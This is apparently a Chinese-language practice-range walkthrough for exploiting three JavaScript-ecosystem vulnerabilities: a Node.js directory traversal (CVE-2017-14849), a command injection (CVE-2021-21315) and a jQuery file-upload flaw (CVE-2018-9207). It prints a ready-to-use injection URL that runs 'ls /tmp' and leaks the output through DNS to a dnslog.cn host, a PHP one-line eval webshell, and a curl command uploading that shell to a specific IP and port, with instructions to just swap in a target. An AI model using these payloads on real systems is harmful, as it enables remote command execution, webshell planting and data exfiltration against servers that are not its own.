javascript开发框架
靶场搭建可用蓝易云服务器
Node
Node.js 目录穿越漏洞(CVE-2017-14849)
我们可以通过F12看到有很多文件加载了
那么目录穿越是什么呢
其实就是攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件
那么我们尝试加载
main.js文件
我们可以看到是无法读取到的
说明我们的路径还是不正确
那么如果真的要搞清楚这个路径需要用到工具去对路径进行拆解了
那么这个文件的真实路径是
/static/main.js
我们尝试下
可以看见是读取的到的
那么就证明了
如果你知道路径你就可以去穿越目录了
参考
(CVE-2017-14849)Node.js 目录穿越漏洞
node.js 命令执行 (CVE-2021-21315)
这个的话怎么搞呢
首先用到一个网站工具
获取一个url
这时候套用模板就可以了
/api/getServices?name[]=$(ping%20`ls%20/tmp`.qki7ut.dnslog.cn)
替换上面的url
/api/getServices?name[]=$(ping%20`ls%20/tmp`.n9wgwv.dnslog.cn)
直接替换上
然后访问
这个时候我们回到那个工具网站
点击上面的那个按钮刷新几下就🆗了
jQuery
jQuery 文件上传漏洞(CVE-2018-9207)
主页面
然后写一个一句话木马
php
<?php
@eval($_POST['shell']);
?>
然后在当前目录下打开cmd
curl -F "myfile=@shell.php" "http://123.58.236.76:19514/jquery-upload-file/php/upload.php"
执行这条命令
只需要改目标ip和端口还有就你的一句话木马文件就可以了
/jquery-upload-file/